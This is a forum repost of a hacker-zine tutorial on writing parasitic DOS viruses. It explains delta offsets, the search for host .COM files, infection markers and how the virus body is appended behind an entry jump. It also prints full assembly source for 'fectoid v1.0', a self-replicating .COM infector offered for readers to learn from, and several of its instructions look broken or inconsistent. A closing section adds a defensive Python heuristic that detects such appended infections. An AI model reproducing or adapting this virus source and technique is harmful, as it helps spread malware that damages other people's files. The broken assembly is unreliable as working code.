Nytro Posted December 9, 2010

Parasitic Viruses
Author: z3ro

model z3ro.the parasitic.com infector
org 100h
push disclaimer

I (and the dmz/gny members/staff) take no responsibility for what you do with the knowledge gained from this article. This is for informational purposes only and I do not encourage criminal behavior. If you have a problem with me writing about this topic and think I am a criminal for doing so, I'd like to point out Article 19 of the Universal Declaration of Human Rights, which states: "Everyone has the right to freedom of opinion and expression; this right includes freedom to hold opinions without interference and to seek, receive and impart information and ideas through any media and regardless of frontiers."

What's happening this time?
1. Why asm is best for viruses
2. What is a parasitic virus
3. The delta offset and infection
4. fectoid v1.0

;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
;Call Asm_is_the_shit

Now if you have ever seen the source for a virus you will probably have noticed that it is in assembly (90% of the time). Now why would it be in asm? Isn't asm uber hard? Well, asm is a low level language: it deals directly and very closely with the CPU, the OS and memory. This allows you to do things you couldn't do with C, for example calculate a delta offset (more on this later). When using C it is possible to create a basic overwriting virus, but these are lame and probably wouldn't work in this day and age due to protected mode.

ret

;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
;Call parasitic

OK, so what is a parasitic virus? It is quite different from an overwriting virus, as it does not damage the host program. There are two main methods of doing this. We must first place a jump at the start of our host to our virus. We must then calculate the offset to the end of the host and place our virus there. We must also make sure that we return control back to the host, or else we risk suspicion and errors. There are two main methods of writing a parasitic virus (DOS): we could append to the front of the code or at the end. The front tends to be a little faster, though it is much more complicated. The second method is to append at the end, and that is what we are going to cover here.

retn

;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
;Call infect

OK, so you have heard all the theory, time for some code. When writing a parasitic virus you first need to calculate the delta offset. This is very easy to do, but it is also a very important step.

    first:
        call next
    next:
        pop di
        sub di,offset next

Now we have the offset that points to our code. Another very important part of a virus is the find mechanism. This is also very easy, as all we have to do is use function 4eh of interrupt 21h.

    masker db "*.com",0

        lea dx,[bp+offset masker]
        mov ah,4eh
        etc...

OK, so we have found our unwilling host. But how do we know if we haven't infected him already? We simply read the first few bytes and compare them to a string (which usually consists of a jmp to our code).

        mov ax,3d02h
        lea dx,[bp+offset dta+30]
        mov cx,3
        int 21h
        xchg ax,bx
        int 21h
        mov ax,word ptr [bp+dta+26]
        mov cx,word ptr [bp+ID+1]

    ID db "lalala",0

And now the moment you have all been waiting for: INFECTION!!!! Which is in fact extremely simple. We first must set up the jmp to our code and then our ID string, then write them to the front of the host. We do, however, have to use function 4200h, which is straightforward.

        mov ah,40h
        mov cx,3
        lea dx,[bp+jmpz+ID]
        int 21h

    jmpz db 0e9h ; jmp to start of virus code
    ID   db 20h,20h,0

We then reset the file pointer and write the rest.

        mov ah,40h
        mov cx,eov-offset start_virus
        lea dx,[bp+offset start_virus]
        int 21h

We have just gone through the basic methods of a parasitic virus. We have only discussed how to infect a .COM file. In the next article we will cover DOS .EXEs and a little PE (I still can't infect them properly) file infection.

ret

;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
;push v1.0
;call fectoid

Alright, well, I threw together some basic code for this article. It IS VERY basic. It only covers what we have discussed in this article. Now it is very poorly done tbh, but I feel it's very easy to learn from. Keep in mind I only spent about 20 min working on it, but you can laugh if you want. I'd also like to point out that none of these viruses will work on windoze. The techniques are similar, but now you can't simply overwrite a file and get away with it. Learning how to do this is the first step. Sooner or later I'll get into PE infection, which is MUCH MUCH more complicated. Anyways, I hope you enjoy. I'll post a better version sometime soon: an infection checking system that actually works and better coding in general. Enjoy.

    .model small
    org 100h
    .code
    .startup

    Vic   db "*.com",0
    dta   db 42 dup (?)
    junk  db 41h,41h,0
    leap  db 0e9h,41h,0
    _fect db ?

    ; here we set up offsets and the like
    start:
        db 0e9h
        dw 0
    do:
        call next
    next:
        pop di
        sub di,offset next
        lea si,[bp+offset junk]
        mov di,100h
        push di
        movsw
        movsb
        mov _fect,5          ; up to 5 infections per run
        ; set up dta to match our delta or else bad things will happen....
        lea dx,[bp+offset dta]
        call DTA_set

    find_first:
        mov ah,4eh
        lea dx,[bp+offset vic]
        int 21h
        call ok
    find_next:
        mov ah,4fh
        int 21h
        call ok
        jc quit
        jmp find_next

    ; here we make sure the file is a .com file and check for previous infections
    ok:
        mov ax,3fh
        lea dx,[bp+offset dta+30]
        mov cx,3
        int 21h
        xchg ax,bx
        int 21h
        mov ax,word ptr [bp+dta+26]
        mov cx,word ptr [bp+junk+1]
        add cx,eov-do+3
        cmp ax,cx
        sub ax,3
        mov word ptr [bp+buff],ax
        xor al,al
        call file_
        mov ah,40h
        mov cx,3
        lea dx,[bp+leap]
        int 21h
        mov al,2
        call file_
        mov ah,40h
        mov cx,eov-do
        lea dx,[bp+do]
        int 21h
    close:
        mov ah,3eh
        int 21h
        dec _fect
        cmp _fect,0
        jnz find_next
        jmp host

    host:
        mov dx,80h
        int 21h
        mov di,100h
        jmp di

    quit:
        mov ax,4c00h
        int 21h

    ; sets the dta duh...
    dta_set:
        mov ah,1ah
        int 21h
        retn

    ; this sets up and returns our file pointer
    file_:
        mov ah,42h
        xor cx,cx
        xor dx,dx
        int 21h

    eov  equ $
    buff dw ?
    END
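Seen from the other side of the table, the layout the article describes (an E9h jump at the .COM entry point that lands on a body appended at the end of the file, plus a recognisable byte string inside that body) is exactly what a scanner checks for. Below is an added example, not code from the article or from z3ro: a small Python heuristic that decodes the entry jump, works out the file offset it lands on and looks for a known marker in that region. The sample images, the `*.com` marker and the tail-fraction threshold are constructed assumptions for this example.

```python
"""Heuristic scanner for .COM images with an appended body (added example).
A .COM file has no header: byte 0 is the entry point, loaded at CS:0100h. The
appending technique above replaces the first three bytes with jmp rel16 (E9h)
aimed at code glued to the end of the file, so a scanner can decode where that
entry jump lands and inspect the region it lands in."""
import struct

JMP_REL16 = 0xE9
DEFAULT_MARKERS = (b"*.com\x00",)   # assumed signature: the body's search string

def entry_jump_target(data: bytes):
    """File offset an entry-point jmp rel16 lands on, or None if there is none."""
    if len(data) < 3 or data[0] != JMP_REL16:
        return None
    disp = struct.unpack_from("<h", data, 1)[0]   # signed 16-bit displacement
    # target = 0103h + disp; minus the 0100h load base = file offset, 16-bit wrap
    return (3 + disp) & 0xFFFF

def scan_com(data: bytes, markers=DEFAULT_MARKERS, tail_fraction=2 / 3, min_tail=16):
    """Findings for one image; 'suspicious' is a heuristic verdict: the entry
    jump lands in a tail region, or a known marker sits in that region."""
    report = {"entry_jmp": False, "target": None, "tail_len": None,
              "marker": None, "suspicious": False}
    target = entry_jump_target(data)
    if target is None:
        return report                              # no E9h at the entry point
    report["entry_jmp"], report["target"] = True, target
    if target >= len(data):
        report["suspicious"] = True                # jump leaves the image
        return report
    tail = data[target:]
    report["tail_len"] = len(tail)
    report["marker"] = next((m for m in markers if m in tail), None)
    lands_in_tail = target > len(data) * tail_fraction and len(tail) >= min_tail
    report["suspicious"] = report["marker"] is not None or lands_in_tail
    return report

# Constructed sample images (hand-assembled for this example, not from the article).
# mov ah,9 / mov dx,010Bh / int 21h / ret / "Hi$": prints a string, 11 bytes.
CLEAN_COM = bytes.fromhex("b409ba0b01cd21c3") + b"Hi$"
# A legitimate program that starts with a jmp over its own data.
JMP_OVER_DATA_COM = bytes.fromhex("e90300") + b"Hi$" + bytes.fromhex("b409ba0301cd21c3")
# The 11-byte host with its first 3 bytes replaced by jmp +8, then a 16-byte
# tail holding the marker; NOPs stand in for code.
MARKED_COM = bytes.fromhex("e908000b01cd21c3486924") + b"*.com\x00" + b"\x90" * 10
# A 60-byte host whose entry jmp +57 lands in a 24-byte tail with no marker.
TAIL_JMP_COM = bytes.fromhex("e939000b01cd21c3486924") + b"\x00" * 49 + b"\x90" * 24
```

A legitimate program that starts with a jump over its own data also has E9h at the entry point, which is why the position test alone stays a heuristic and `JMP_OVER_DATA_COM` is there to show it not firing; on a real directory you would call `scan_com(open(path, "rb").read())` per file and review the hits by hand.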